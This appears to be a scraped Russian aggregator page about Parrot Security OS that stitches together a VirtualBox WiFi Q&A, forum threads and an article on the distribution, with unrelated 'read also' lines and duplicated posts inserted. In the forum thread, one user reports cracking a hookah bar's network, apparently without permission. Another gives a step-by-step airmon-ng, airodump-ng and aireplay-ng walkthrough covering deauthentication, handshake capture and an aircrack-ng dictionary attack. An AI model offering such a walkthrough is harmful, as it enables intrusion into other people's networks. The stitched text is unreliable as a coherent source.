Линукс parrot wi fi

Как настроить WiFi в виртуальной коробке Parrot Security OS?

Я недавно установил PSOS (ОС Parrot Security) в Virtual Box, но теперь я не могу получить WiFi на VB. Я использую Ubuntu в качестве основной ОС и Parrot в качестве моего VB.

1 ответ 1

Virtualbox создал виртуальный компьютер внутри вашего хоста Ubuntu, и, как виртуальный компьютер, он виртуализировал все свое оборудование, включая сетевую карту

virtualbox создает виртуальную сетевую карту (например, виртуальный Ethernet-кабель), подключенную к виртуальной машине и NAT за соединением, которое уже установлено вашим хостом Ubuntu

вы не можете использовать свою карту Wi-Fi непосредственно в вашей виртуальной машине, так как невозможно заставить две операционные системы использовать одно и то же устройство одновременно

Единственное решение — выполнить сквозную передачу pci/usb, это означает, что набор микросхем wifi будет отсоединен от ubuntu и подключен к виртуальной машине (поддерживая хост ubuntu в автономном режиме и предоставляя попугайкам возможность сканировать сети Wi-Fi, перехватывать трафик и беспроводное тестирование)

Другое решение состоит в том, чтобы купить внешний ключ Wi-Fi и подключить его к виртуальной машине с помощью USB-подключения, если у вас его еще нет и вам нужно его купить (и если вы намерены провести тесты безопасности беспроводных сетей), тогда официальный Портал документации Parrot предлагает список устройств с некоторыми наборами микросхем с полной поддержкой прослушивания / инъекции (https://docs.parrotsec.org/doku.php/supported-wifi-devices).

лучшим должен быть TP-LINK TL-WN722N

есть другое решение, которое вы можете попробовать

virtualbox создает виртуальную сеть NAT для вашей виртуальной машины, это означает, что виртуальная машина может иметь доступ к Интернету, но не к вашей локальной сети (LAN)

если вы измените настройку своей виртуальной машины с «NAT» на «мост», то ваша виртуальная машина сможет видеть все другие машины в вашей локальной сети (но, конечно, здесь нет тестирования беспроводной сети)

Источник

Взлом Wi-Fi, неудачи на Parrot OS. В чём проблема?

baskervillyy

Member

Valkiria

На первой картинке тебя просят:
1. Убить все процессы, которые могут помешать работе программы airmon-ng.
# airmon-ng check kill
или убей все процессы, номера которых указаны
# kill 658 663 664 673 893
2. Установить hcxpcaptool
# apt-get update
# apt-get install hcxpcaptool
Если ты установил эту софтину, то значит установка прошла некорректно.

На второй картинке сообщение о том, что программы pyrit и aircrack-ng посчитали твоё рукопожатие невалидным, а cowpatty не нашла подходящего пароля в твоём словаре. Рукопожатие не расшифровано. Меняй словарь. Но скорее всего, твоё рукопожатие — не валидно.

Как ты сделал себе такой красочный эмулятор терминала ? Редактировал

/.bashrc ? Где брал содержание этого файла ?

baskervillyy

Member

На первой картинке тебя просят:
1. Убить все процессы, которые могут помешать работе программы airmon-ng.
# airmon-ng check kill
или убей все процессы, номера которых указаны
# kill 658 663 664 673 893
2. Установить hcxpcaptool
# apt-get update
# apt-get install hcxpcaptool
Если ты установил эту софтину, то значит установка прошла некорректно.

Читайте также:  Linux mint не работает usb

На второй картинке сообщение о том, что программы pyrit и aircrack-ng посчитали твоё рукопожатие невалидным, а cowpatty не нашла подходящего пароля в твоём словаре. Рукопожатие не расшифровано. Меняй словарь. Но скорее всего, твоё рукопожатие — не валидно.

Как ты сделал себе такой красочный эмулятор терминала ? Редактировал

/.bashrc ? Где брал содержание этого файла ?

Valkiria

Я знаю точно, что в любом дистрибутиве можно сделать терминал вот таким красочным. У меня было решение. Но — в прошлом )) Вчера установила себе debian и допиливаю. В эмуляторе не могу добиться желаемой картинки ))

Я думаю, что дело у тебя не только в словаре. Твоё рукопожатие — не валидно. Посмотри выше, я заранее предупреждала, что оно заведомо в твоих условиях будет содержать много мусора или будет не валидным. Программа pyrit не только брутит хэндшейк, но и проверяет его на валидность. Она и сообщила тебе о невалидности.

Не работай в области вардрайвинга на автоматах типа аиргеддон, вафайти и подобных. Они — блеф, иллюзия успеха. Если хочешь успеха, то во всём придётся разобраться в ручном режиме.

baskervillyy

Member

Я знаю точно, что в любом дистрибутиве можно сделать терминал вот таким красочным. У меня было решение. Но — в прошлом )) Вчера установила себе debian и допиливаю. В эмуляторе не могу добиться желаемой картинки ))

Я думаю, что дело у тебя не только в словаре. Твоё рукопожатие — не валидно. Посмотри выше, я заранее предупреждала, что оно заведомо в твоих условиях будет содержать много мусора или будет не валидным. Программа pyrit не только брутит хэндшейк, но и проверяет его на валидность. Она и сообщила тебе о невалидности.

Не работай в области вардрайвинга на автоматах типа аиргеддон, вафайти и подобных. Они — блеф, иллюзия успеха. Если хочешь успеха, то во всём придётся разобраться в ручном режиме.

Valkiria

baskervillyy

Member

Первый успех. Спасибо за помощь, друзья. Кальянная пробита и расшифрована!)

Valkiria

baskervillyy

Member

explorer_traveler

baskervillyy: для того, что-бы понять базовые принципы взлома Wi-Fi *(самых распространённых векторов атак) нужно изучить инструменты airmon-ng, airodump-ng, aircrack-ng, aireplay-ng. С ними поймёшь азы. Все вышеперечисленные в ветке инструменты — скрипты для автоматизации работы этой чётвёрки (ну не считая reaver для атаки Pixie Dust и подбора пина для WPS).

Как по мне, лучший начальный инструмент автоматизации атак на Wi-Fi сети — это wifite.

Немного мануала от меня по киту-airmon-ng, airodump-ng, aircrack-ng, aireplay-ng:

Команды в первом терминале:
airmon-ng start wlan0 #интерфейс должен стать на wlan0mon
airodump-ng wlan0mon #выбираешь атакуемую точку доступа (и одного из клиентов на ней, что не обязательно, но желательно)
airodump-ng —bssid 00:00:00:00:00:00 -c 1 —write ./Desktop/ wlan0mon # -с 1 = канал точки доступа из airodump-ng

Команды во втором терминале:
aireplay-ng —deauth 30 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon #топим соединение между хабом и клиенитом deauth пакетами (-a = точка доступа, -c один из клиентов на этой точке)

Ожидаем WPA handshake в окне первого терминала («Waiting for WPA handshake 00:00:00:00:00:00»)
Когда handshake словлен открывает третий терминал.

Читайте также:  Grub loading error 17 windows

Команды в третьем терминале:
aircrack-ng -w ‘./Desktop/vocabulary_top100.txt’ -b 00:00:00:00:00:00 ‘./Desktop/-01.cap’ #собственно, сам подбор по словарю (-w = путь к словарю, -b = MAC адрес атакуемой точки доступа)

Смотрим в терминал, завариваем кофе, чувствуем себя начинающим пентестером и ждём сообщения «KEY FOUND! [qwerty]»

Источник

Установка внешнего wi-fi адаптера на Parrot OS

Доброго времени суток. Приобрел на днях внешний wi-fi адаптер к ноутбукe c Parrot OS (TPLink tl-wn722n второй версии). Использовал следующие команды:

sudo apt update sudo apt upgrade sudo apt install bc sudo apt install build-essential sudo apt install libelf-dev sudo apt install linux-headers-$(uname -r) sudo apt install dkms

Все они проходят без каких-либо проблем, но дальше происходит следующее:

sudo rmmod r8188eu.ko rmmod: ERROR: Module r8188eu is not currently loaded

После чего я естественно пытаюсь его установить:

git clone https:github.com/lwfinger/rtl8188eu

Все проходит успешно. Но повторная попытка в эрмэмод приводит к все тому же результату. Что следует сделать? Заранее спасибо за ответ.

Консоль вместо выбора опций при установке Parrot OS

Помогите, пожалуйста. При установке Parrot Security OS вместо выбора опций (типо Install, Live mode и т.д.) отображается только консоль. Что делать??

Проблемы с Virtual Box.

Уважаемое сообщество сего форума, столкнулся с проблемой в Virtual Box.

Пользуюсь OS Parrot, т.к. она на debian 10 скачал программу с оф. сайта.

Если точнее этот файл Debian 10

Устанавливал не через консоль, поэтому если и были ошибки я о них не знаю, кроме одной. virtualbox-dkms не встаёт что бы я с ним не делал. Перелопатил всевозможные форумы, ничего не помогло.

При установке появляется подобная ошибка

так же при запуске VB в консоли появляется такое сообщение

Ну и как сказано в «сообщении» ВМ запустить не получается, появляются две ошибки:

Второй день голову ломаю, поискал на форумах ничего, покорно прошу вашей помощи.

P.S. Прошу простить за орфографию и оформление, впервые пишу здесь.

Помогите с Parrot Securitu OS, пожалуйста

Вобщем поставил себе Parrot с офф. сайта. Поставил как основную оС. После установки и перезапуска тупо черный экран и мигающий прочерк. Помогите решить эту проблему пожалуйста. И подскажите как включить Repair Mod

VM Parrot 4.6 работа firefox через Proxychains-NG

Здравствуйте уважаемая публика. Кто работал в Parrot подскажите. Ситуация такая. Я пробовал работать в Kali в Firefox через Proxychains а вот в Parrot nmap значит работает, пробиваю свой IP тоже все ок, как только запускаю команду или все запускается только ничего не работает. Выкладка терминалки:

proxychains4 firefox 2ip.ru [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so Reading profile /etc/firejail/firefox.profile Reading profile /etc/firejail/firefox-common.profile Reading profile /etc/firejail/disable-common.inc Reading profile /etc/firejail/disable-devel.inc Reading profile /etc/firejail/disable-interpreters.inc Reading profile /etc/firejail/disable-programs.inc Reading profile /etc/firejail/whitelist-common.inc Reading profile /etc/firejail/whitelist-var-common.inc Switching to pid 6873, the first child process inside the sandbox Child process initialized in 11.20 ms Error: cannot read UID_MIN and/or GID_MIN from /etc/login.defs, using 1000 by default Error: cannot read UID_MIN and/or GID_MIN from /etc/login.defs, using 1000 by default Warning: an existing sandbox was detected. /usr/bin/firefox-esr will run without any additional sandboxing features

Народ! Помогите, подскажите!

Parrot OS — как проверить подлинность скачанного файла инсталляции iso ?

Источник

Parrot Security OS — альтернатива Kali Linux

Parrot Security OS — набирающий популярность security-дистрибутив, основанный на Debian-linux. Простой в освоении, подходит и для новичков и для профессионалов. В этой статье я расскажу об этом дистрибутиве и о развитии проекта от одного из контрибьюторов M. Emrah ÜNSÜR с которым мне удалось пообщаться.

Читайте также:  Вкладки для окон windows

Parrot Security OS

Набирающий популярность security-дистрибутив, основанный на Debian-linux. Довольно простой в освоении, подходит и для новичков и для профессионалов. Этот дистрибутив нацелен как на проведение тестирования на проникновение, так и на анонимную работу в сети Интернет.

Довольно легкий и эффективный инструмент, многие security специалисты нашли в нем замену все более «прожорливому» Kali, тем более что Parrot использует репозитории Kali для обновления. Использует оболочку MATE и дисплей-менеджер LightDM.

По фукнционалу он похож на Kali Linux, здесь тоже вместе с системой поставляется огромное количество специального программного обеспечения для тестирования безопасности.

Из отличительных особенностей можно назвать больший, нежели в Kali, уклон в анонимность: интеграция I2P (invisible internet project) и предустановленные сервисы TOR.

Существует несколько версий (включающих 32 и 64 битные платформы) Parrot Security OS (3.8 — JollyRoger):

  • Parrot Security 3.8 Full Edition — полная версия.
  • Parrot Lite 3.8 Home Edition — без утилит, как основа для вашей сборки.
  • Parrot AIR 3.8 — для тестирования беспроводных сетей.
  • Parrot Cloud Edition — версия для деплоя в облачных сервсиах.
  • Embedded Devices and IoT — Raspberry Pi, Orange Pi, Pine64.

Развитие проекта

Данный дистрибутив выглядит довольно перспективным, поэтому мне захотелось узнать о нем немного больше и я пообщался с одним из контрибьюторов и активным участником проекта — M. Emrah ÜNSÜR.

M. Emrah ÜNSÜR (meu @ Parrot Project) исследователь по безопасности в частной компании. Является контрибьютором и модератором форума проекта Parrot.

Команда состоит из добровольцев, которые в основном разделены на тех, кто занимается сообществом
и тех, кто пишет код. Команда Parrot OS всегда рада новым участникам:

  • Официальная веб-страница проекта Parrot: www.parrotsec.org
  • Сообщество (форум): community.parrotsec.org
  • Список послов проекта Parrot: docs.parrotsec.org/community/ambassadors-list
  • Местные сообщества проекта Parrot: docs.parrotsec.org/community#local-communities
  • Telegram (ParrotSec Global): t.me/parrotsecgroup

Зачем создавать свой дистрибутив? Есть несколько причин сделать что-то подобное. Основная причина заключается в том, чтобы по рукой всегда было большинство используемых программных продуктов в самой удобной упаковке. В случае Parrot Security OS разработчиков по той или иной причини не устраивали текущие дистрибутивы, в виде простой и готовой к использованию сборки, с постоянными обновлениями, современными технологиями и актуальным списком ПО, которое реально используется при проведении пентеста. (Самое время вспонимть BlackArch c > 1500 утилит). Также этот дистрибутив должен подходить для повседневной работы.

Для тех, кто жалуется на фрагментацию проектов, есть информация о том, как работают сообщества с открытым исходным кодом: фрагментация вызывает диверсификацию и свободное выражение идей от других команд аналогичных проектов. Также в рамках работы над проектом ведется сотрудничество
Debian pkg-security.

В планах по развитию — создание полного пула документов и текстовых книг по разработке, системному администрированию, сетевому взаимодействию, криптографии, анализу вредоносных программ, пентестингу и т. д. Еще один вектор развития — это поддержка новых встроенных устройств. Также, основная проблема — аппаратная совместимость — требует много усилий, и в планах по развитию — привлечение новых членов сообщества, знающих Python, C, Bash.

Источник

Оцените статью